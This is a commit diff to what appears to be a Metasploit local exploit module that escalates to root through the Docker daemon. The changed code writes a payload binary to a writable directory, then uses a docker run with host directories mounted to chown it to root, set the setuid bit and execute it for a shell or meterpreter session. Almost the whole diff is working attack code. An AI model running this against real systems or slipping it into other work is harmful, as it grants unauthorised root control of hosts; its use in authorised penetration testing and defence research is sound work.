Incorporate review fixes, ensure PrependFork is true, fix echo compat.

forzoni · forzoni · commit 6f35a04e21a8 · 2016-07-19T01:45:56.000-05:00
diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
   include Msf::Exploit::EXE
   include Msf::Post::File
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info, {
@@ -23,12 +24,13 @@ def initialize(info={})
       'Author'        => ['forzoni'],
       'DisclosureDate' => 'Jun 28 2016',
       'Platform'      => 'linux',
-      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Arch'          => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
       'Targets'       => [ ['Automatic', {}] ],
+      'DefaultOptions' => { 'PrependFork' => true },
       'SessionTypes'  => ['shell', 'meterpreter']
       }
     ))
-    register_options([
+    register_advanced_options([
       OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
       OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
     ], self.class)
@@ -45,15 +47,19 @@ def check
 
   def exploit
     pl = generate_payload_exe
-    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
-    print_status("Writing payload executable to '#{exe_file}'")
-    write_file(exe_file, pl)
-    cmd_exec("chmod +x #{exe_file}")
-    vprint_status shell_script(exe_file)
-    vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
+    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status("Executing script to create and run docker container")
+    vprint_status cmd_exec("chmod +x #{exe_path}")
+    vprint_status shell_script(exe_path)
+    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
 
     stime = Time.now.to_f
-    print_status "Starting the payload handler..."
+    print_status "Waiting for payload"
     until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
       Rex.sleep(1)
     end
@@ -62,11 +68,12 @@ def exploit
   def shell_script(exploit_path)
     deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
     dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
+
     %Q{
-      IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
+      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | cut -d ":" -f2`
       EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
       docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
-      docker rmi $IMG
+      docker rmi -f $IMG
       #{exploit_path}
     }.strip.split("\n").map(&:strip).join(';')
   end
